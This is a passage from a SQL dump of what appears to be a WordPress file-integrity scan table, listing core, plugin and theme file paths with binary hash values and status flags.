','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('P�uq-��h�}[O&�','wp-content/plugins/wp-cerber/assets/flags/py.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�0�]��2T쑤','�{Bu�c	,��\n�<�EҲ�m�N���o�','',0,'?'),('P�Zy7�qX�I9��','wp-includes/blocks/post-author-biography/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����OD�+�$','�|Zc�t�r�}U{���Upy:�d��<�n��','',0,'?'),('P���VV�N{��j-','wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iy�v��#<��Q!��','�r���kv�\")6�B}�zE8�7R���E؀�','',0,'?'),('P��/ն�؉N��\r7k','wp-includes/wp-includes/random_compat/random_int.php',0,'*�RX�Ǡ�ͤB�n6','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('Q㯦�\"��g��w�f�','wp-content/themes/hitmag/inc/widgets/popular-tags-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�ͧ=E����(�','7��U�/���*R��/g}��[�A�$?�\'���','',0,'?'),('Q\r���	V��Au�','wp-content/plugins/wordpress-seo/src/services/importing/conflicting-plugins-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<&�.���\"��c��','{ �LЍ\\&��ܼw��޲?�O����\0���','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�t����+���΃','�(�RF��q�kv��ɚ+���R�n��*@g','',0,'?'),('Q?��ٟ�g�L�|ua','wp-includes/class-wp-textdomain-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L���n�\n��!,j','_����(Iz�j���i݁\r�\Z��#�','',0,'?'),('QC�ȧ���$9B)��M','wp-includes/blocks/tag-cloud/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xge�sE��ȧ4�q/�','��vO2y�3D�ܡ~3�]6ۈ\0�$��Hn�!J','',0,'?'),('QG�gʚ��l�L���','wp-content/plugins/wp-smushit/app/assets/css/smush-global.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T/x݀�b�I}Q�\Z�','-���;�����i����=�\ZlJ\ZJdM�vv��','',0,'?'),('QG3��G]^pXS~��','wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-I�\Zʑ*0\Z���7�','��\"-_z/�VFd�a���{�vp<f��i���&','',0,'?'),('QL�뿓�Y\n̵�{	','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�L��\Z�2','`^�. �?�����@U-�;8����&5��','',0,'?'),('QM9�K7�ܑlG��','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',0,'R�*L�TG��4%P���','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i0��`��ڛ�&F�J','I�%�\Z��t��aC���E�!ƌ�-�/^','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QiYJ�M:r\r��g','wp-content/plugins/wp-cerber/assets/flags/bq.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ؒ5d�\0�v��',':ϻ�\rle	+� 6s��!�\n8���D�|','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Q{%�p U��/o','wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-modules-webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YC��|��K���	Z','hWXT�y5�j~;���Y8�/�\'r�_','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�mR�_��`�W6�\0','s)W�?Pӎ�B�*?x�BZ��dɗ�eZٞ{','',0,'?'),('Q�;2�g�D��%榭|','wp-content/plugins/wp-cerber/assets/flags/rs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����(�7gK\'ͅ#$','G���ou�˞?�jo?d�w��wO�o{��C�M�','',0,'?'),('Q���PA���鐚�z�','wp-includes/blocks/columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��=��-��}\Z@�Uo','A��㢫_	�K���❤K^�?D�{�A��','',0,'?'),('Q�P5Z���w�Nia�','wp-includes/blocks/quote/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N1�l�X��_���','�;�����B�9jV=~�?x�O)Ѭ�T��A','',0,'?'),('Q�ՔY�k��`4��E�','wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js',0,'�S!}EU�\\b�g�h��=','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('Q�1BUL�Q��d �S','wp-content/plugins/wp-cerber/assets/flags/um.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q#}��X��s�\'\0�','�S�,��R]���&�;ݟ�J{��&���','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xAI6m�NdSpVBׇ','Z?�RA��+�7#�C�-�\\4g[o?J�_�g','',0,'?'),('Q�x��̿Py���\'uE|','wp-includes/blocks/page-list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mx(xt\r2X�M�q','�w���R�<��O�.�u�6.���[ħ#��','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�l��� ���','��� �1rG֨J|�����,P��D�U�Б$�','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q��4��%��z�>*��I','wp-content/plugins/wordpress-seo/inc/class-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C\r{�q}���˰X','��M��|E����k����z���ܘ�`���','',0,'?'),('Qˢ�I��E��Z0k','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�ü8֍2�q���','O��ޠe�[�(�[��_��ǨLd�9J)Yy','',0,'?'),('Q�G��7��2C\r�i','wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d<ۥ��\r��&�','r2[Oᨣ�h�~3/�:Զ��\'���\r�w���','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�F��Y��\"�4\\�','fN���ϻ`�\nq�^�Z\Z~�<��\'�I[�!�','',0,'?'),('Q��)*8O�ԫ4;�i','wp-content/plugins/wordpress-seo/src/helpers/wpdb-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�����|�W�474m�','B�H��\r$��i���$�Pd� �!٧9','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�Xv4��\n����l�','�G��}P��8����wC�jIȀOKîX~��3','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$!�G����	����','3��&�)��W+���/�/�^��qu֢\Z','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Nj�cJ�n�H�\'','��T%��#�5r����c5��꘩����m7','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�>�A�P�P�u4Ą�','�����v�5ᐪmє\"-�*~`�`Qg1F��/','',0,'?'),('Rhz���%�s!ӇVd','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B!���,����ۭ��','&��\Z>i���q���;�)Z�RIe�`�LC�&��','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0\rJ`X�\"8�by','oHi��Y�N3	>����_����J�,���S^','',0,'?'),('Rl��t<�P���k�p�','wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/greek-support-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�1�+\n���','�P�q2>��\"�Bxk��ݼ�B��!/K���z[','',0,'?'),('R|Q˕W˞h�gT��','wp-content/plugins/wp-cerber/assets/flags/kn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��4�J6.�[��H�','8d\n\\|-ZC��d7��y*�I��qa�\ZD\r�','',0,'?'),('R�;9grl�������','wp-content/plugins/wordfence/css/wf-colorbox.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('R��F�E��A�5�r�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/knowledge-graph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֕������@�%g�c','&���+�3=m���U��M{��c�#�F��','',0,'?'),('R���1?���Y�VDt�','wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','An��f�.t�7H�t��','�E��\0��D�.�<��\'���iZAƬ4n�','',0,'?'),('R����q8U�{\0��','wp-content/plugins/wordpress-seo/src/surfaces/open-graph-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f/�ihk	dM~�P\0�','ި������HԀ��KΉ.�[��m�p���1#�_','',0,'?'),('R��A���H=��W�>�a','wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��0\0N���D	�F�','�Sl��fA� O�	�w|=EB͐�Df���q','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0�m<2|�*�','�0׫m<�0��b�?�k6��X�C���8��','',0,'?'),('R��O*���(\'=�C�','wp-content/plugins/wp-cerber/assets/flags/gs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zJ�<}Ė�Jǀ��','L �:�W�\\�%����M����^>�䴉���','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|5���o�$���Q��','�aB������7�MM�-����ۙ}��r����','',0,'?'),('R¥�����Le�q	�&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jl�,��f.�Vh��','��\ZԂ	8�՜g\\����IS�����グ6���','',0,'?'),('R��ܰoL�8~\\�lCR','wp-includes/blocks/audio/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��\r|�[���γ\"�','�������e<�A����l��e*\Z�7d','',0,'?'),('R�;�l}5�vN5�5��','wp-content/plugins/wp-cerber/assets/flags/mf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�]M\0E�xР7�v','�z��k ���YjO��J��[W��R','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+~;�����2�x�\r`',':I���a.�\0�\"\\�W7\"�꿩����4�','',0,'?'),('R�y��C|��,}�,1','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���8��cR*��','/�pP�2Q�i�,���+YL��)+�s)M','',0,'?'),('R��G5�����to�$o','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\\��3\rfKct��L�','l�9X.���(������g���Z��SJ:(�*','',0,'?'),('S?�d�xS���َ@','wp-includes/blocks/query-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��Q�*em3���b)','� �w&�jk�l�y�D00A�I�`�}�i','',0,'?'),('S�T��ʝI�o��x!','wp-includes/wp-includes/class-wp-term.php',0,'��Q5��ׄXZ��','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('SVf=�1_Mw�r>\"J\n','wp-includes/blocks/comments-pagination/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<B�]��p�2eȹ','��[�i�����+C��Ǵx�\0�_nɠc����\0','',0,'?'),('S!7�Y*e4�J���S','wp-includes/blocks/comment-template/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�|�*���.��\ZXC','��A��.�٤H�����WC�����du.�j�n','',0,'?'),('S#A��c]����z\'�','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',0,'�V�̦���QK�#΀','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('S+w�!&�\Z�\"��G}�','wp-content/plugins/wordpress-seo/src/deprecated/inc/class-wpseo-validator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rjM��n��s�X�_�','�T��Xjuei�vW�.�b*�u8�^�O�q���','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ң��4�K','z�\\�:Ǝ�[4d`}{;�ѕ�fx�Lԩ�=','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','괁����M��s�m��','B�?��5��SEV�J�z~^�~.�8�%_\\�u7','',0,'?'),('SG}�E�ضW@�\\�f�}','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-name.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʹOG��K��Պ�`','���[=;�d��l�-���륌Z-��u�^�Ua','',0,'?'),('SLdt���Q®���','wp-content/plugins/redirection/database/schema/233.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=�Gq d�4�r','$���4� ����Pc�M��)K\\�g2�=ѯ`�','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('S`{_�~?+�ߵ�{�','wp-includes/wp-includes/class-wp-network.php',0,'�ZM�ٟ�:�l\"pdΛ�','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�E��A6��9�`_�','�҄��߸��v!\"O�Q��͛h�R\"�y_�','',0,'?'),('St�$�K�Yb!�N�x\r','wp-content/themes/twentytwentythree/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v{�HP5�3��','T�9�\'H�Y�=����]�D�z\".�G�Y�','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�CZ�����r�\Z�{s','�{�U�{���6��X̃�Cآ��DA\\a','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��|�6�V!�;O','�J��DƜ������.�[������)�{�','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �\'�`��{���','sv%���[8��R�����+aM!\"���V/6�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S��l�+d{�\0%�L�','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�F����~�s��i�','�vzb�@�Q\\ãs,����g�*���z��Y','',0,'?'),('S�_��@8Q�̞�����','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',0,'�-\\�d��oG��\n��2','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[[+b~9��W��X[�','���#��w��N�:�Zũ�꧐���\rh','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S����L�گj�)>��','wp-content/plugins/wp-cerber/assets/flags/cw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��z�jD7�Z��_��','ʚj\'��z��-F��>��8�o}�ti���z�','',0,'?'),('S�Y!Z���\'�����','wp-content/plugins/wp-smushit/core/class-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��e\"p!�������1','��Ԕm{��Gd_���׮G�kw���@�','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�ZV���5�[h۰[','�jUv	G��Һ���Π���\r��A�,s�x�5','',0,'?'),('S�!)q���O�����','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&m��h��†R[}��','m��&��%./}�z�Q��Œ�(V�y��','',0,'?'),('S��;Yd����I��JW','wp-content/themes/twentytwentythree/templates/blank.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0x�z�eF���=�','����\n�#�F�V~���0�Q%*LFk�R����','',0,'?'),('S�r([~T<�ρa���','wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js',0,' C��ȭ?d�{׭V��',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�V���sUN���d�','\"��+f5f(gdC��<i�˳]uƨ2�ļ','',0,'?'),('S�\\8z;�X��8�','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�y�@��g���#','C�9�6Hۉ�p�\')G��C�c�hl�{�N','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G>�5\0�M���t��]/�','���OS2y\rXN\nV�{�,�	_�#�g]��.�','',0,'?'),('T!���ǷCee��R','wp-includes/wp-includes/js/dist/autop.js',0,'߭Φ� ��$=\Z��','߭Φ� ��$=\Z��','��-�����ي�&%����~.+oVr�,>꾥W','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T;�r�UP.���]��i','wp-includes/wp-includes/images/admin-bar-sprite.png',0,'S���:�W���^','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('T?�?:q׮P��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TL�`��xX �l���','wp-includes/wp-includes/images/smilies/icon_eek.gif',0,'�/I ���x�)�(\"��','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ꮹX�F�T���',':��l�9�4��K9��<Y��;X`k=�K��o','',0,'?'),('TO_רwEϧ<�v�΍','wp-includes/blocks/navigation/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɸ��n5i�W��%u1','7�Ⴣ�G���r�E�����=��*���\0��\ZS','',0,'?'),('TT��[fc��-6��','wp-content/plugins/wp-fastest-cache/templates/cdn/maxcdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�_���T#Q�+�;\'','��bB&W��Y�9��w��v~3Zs=%��+�Oݟ','',0,'?'),('Te�\Z���¸M��,�','wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js',0,'4O��DIc`��EJ','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('Tg8�Z��X�\r�^-','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-modal-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�12������R|','���NI�y-�X�I1{�܀<G�08%iKԵn`t�','',0,'?'),('Tn��;��3�P�S6','wp-includes/css/classic-themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D����E�k�','m��0�����m�t�хt����I�U�l�,�','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��xm:4����U�','�ɧu�G�����0��Z}ʉl{���G�q�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Fj��G�Zv�CQ\0`�[','U=�����O��m�C5y���}��5�\\��|\0','',0,'?'),('T��ptz3ug�=\\�sF�','wp-includes/wp-includes/sodium_compat/autoload-php7.php',0,'������n��4��','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<����$E�Զ��','���e�m���\ndb��>%\0Z����','',0,'?'),('T���K����oIV�','wp-includes/wp-includes/class-wp-recovery-mode-key-service.php',0,'�9A��l���%<�C','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('T��Fl�0>��u���','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WR�N`L�_���O��[','�?.��\"}�5����	j2���<��jQ9~�','',0,'?'),('T�h�\Z�}ATx���H�','wp-includes/wp-includes/js/backbone.js',0,'\"$2hj32U������','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6�	Z�+','',0,'?'),('T�\"������2��qh','wp-content/themes/hitmag/inc/kirki/controls/views/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0������=	�','�ڏϭ2������]g/I�z��b�4g`�ǁ�','',0,'?'),('T�2OB��у�Qv��Zb','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��a����Qyr','�*볯3\n�X]��x�v/��Å\'�/��;��\Z','',0,'?'),('T��`5���2z/>�w','wp-includes/blocks/query-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6d���\"U�h�J�A޴','i�D��q�X0m��|�K�@k0\"�p2@�|�','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h��	�_��֚����!E��4�\Zv��F��','',0,'?'),('Tړb�I��v}�z5��','wp-includes/blocks/avatar/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I*�\\�ԗ�Wa��\r+','ځ�S�P|�%._�R�G���|��e8Q]���','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('U���4|)-�\0','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ca.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$T�&��H7V�i','�=&{K�*L�doY��@��qC�jhi�x4�','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U�t]t�A:�ZQ�g�','wp-includes/wp-includes/js/dist/nux.min.js',0,'��G�r�[Ķ��i��k�','��G�r�[Ķ��i��k�','����=cA\"�-3�8��{t-�8 ��h�','',0,'?'),('U*����<�bD�&���','wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js',0,'P����$@A.0�Qt','P����$@A.0�Qt','@b�/E�ؔå��;M	�ۙZRİ�x����','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o\\��%k�&�е��','WW��?���,#zNt���� qC����.g�F','',0,'?'),('ULA\'�7V���gK','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�!�ur�`��}','�6��>�\r �Y؜wY�&�W�U/�xҜIV�','',0,'?'),('U^�/utKHM_��M7j','wp-content/plugins/wordpress-seo/css/dist/installation-success-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�#���a��{��','����\rŶ��;�)_tC~4f,�7R�U�j(�','',0,'?'),('Uf��\\%���J7','wp-content/plugins/redirection/models/flusher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']P�R=H�F�u/����','����+qϋ>�9����l�F�VɊ�z�e\\','',0,'?'),('UgЮA�D�eN\\ڛм','wp-content/plugins/wordpress-seo/src/generators/schema/faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��FW\\\"���bZ�','�_mG��k�`����}(����`�ʊ�TN*C�;','',0,'?'),('Upݽ5�lu����51�','wp-content/themes/twentytwentythree/parts/comments.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D